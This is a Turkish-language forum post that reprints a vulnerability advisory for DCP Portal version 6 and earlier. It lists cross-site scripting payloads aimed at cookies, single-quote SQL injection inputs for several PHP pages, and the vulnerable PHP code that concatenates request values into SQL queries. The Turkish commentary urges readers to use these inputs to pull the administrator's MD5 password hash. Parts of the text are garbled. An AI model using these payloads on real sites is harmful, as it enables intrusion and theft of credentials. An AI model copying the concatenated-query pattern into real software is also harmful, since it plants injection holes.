![]() |
DCP - portal XSS & SQL attacks
DCP Portal <= v6
This script is possibly vulnerable to SQL Injection attacks AND Cross Site Scripting (XSS) attacks The script has been tested with these query variables: XSS : http://[target] /index.php?page=send&cid=**********alert(document.c o okie);</script> XSS - only POST metod calendar.php http://[target]/calendar.php The script has been tested with these POST variables: month=**********alert(document.cookie);</script>&a mp;s=1&submit=GO&year=2003&day=01 Also this script is possibly vulnerable to SQL Injection attacks. The SQL Injection attacks has been tested with these POST variables: register.php sex=1&name=%27&surname=1&email=1&b_month=0&a mp;b_day=0&b_year=0&address=1&zip=1&city=1&a mp;country=1&job=1&tel=1&signature=1&usernam e=1&password=1&password2=1&hide=on&list=on&a mp;action=send&submit=Send lostpassword.php mode=lost&email=%27&submit=Send calendar.php month=1&s=1&submit=GO&year='&day=01 month=1&s=1&submit=GO&year=%27&day=01 index.php?cid=%27[SQL] cod from index.php $sql = "SELECT id, name FROM $t_cats WHERE cat_id = '".$_GET["cid"]."' ORDER BY sort, name"; $result = mysql_query($sql); forums.php?action=showmsg&mid=%27[SQL] cod from forum.php $resultt = mysql_query("SELECT * FROM $t_forum_msg WHERE b_id = '".$_GET["bid"]."' $where AND msg_id = '0'"); while($rowt=mysql_fetch_array($resultt)) { ewt arakdaslar ılk olarak 1 . bolumde xss yanı cros sıte scrıptıng den bahsetmektedır pekı cemetery xss nedır ne cıdır.Bunu meraketıorsanız.Turkce acıklamalı bır yer verem oradakı yazıyı okuyunuz daha sonra da bu konuya bıraz daha kafa yoralım. xss:http://www.kara-kule.net/dokuman/xss_hack.html neyse sımdı ısımıze bakalım yuklardakıu kodu post seklınde yanı cvp vs sekılde kullanılabılır sahsen bızaat ole yaptım.Bunun dısında yukada sql den bahsetmıs sıstemı hata verdırmeye calısmaktasınız ve bunun nerelerden oldugu belırtılmıs. register.php sex=1&name=%27&surname=1&email=1&b_month=0&a mp;b_day=0&b_year=0&address=1&zip=1&city=1&a mp;country=1&job=1&tel=1&signature=1&usernam e=1&password=1&password2=1&hide=on&list=on&a mp;action=send&submit=Send lostpassword.php mode=lost&email=%27&submit=Send calendar.php month=1&s=1&submit=GO&year='&day=01 month=1&s=1&submit=GO&year=%27&day=01 devamıda oyle sız bunları kullanarak sıstem admınıjn md5 hAshını cagırabılırsınız |
Forum saati GMT +3 olarak ayarlanmıştır. Şu an saat: 06:46 PM |
Yazılım: vBulletin® - Sürüm: 3.8.11 Copyright ©2000 - 2025, vBulletin Solutions, Inc.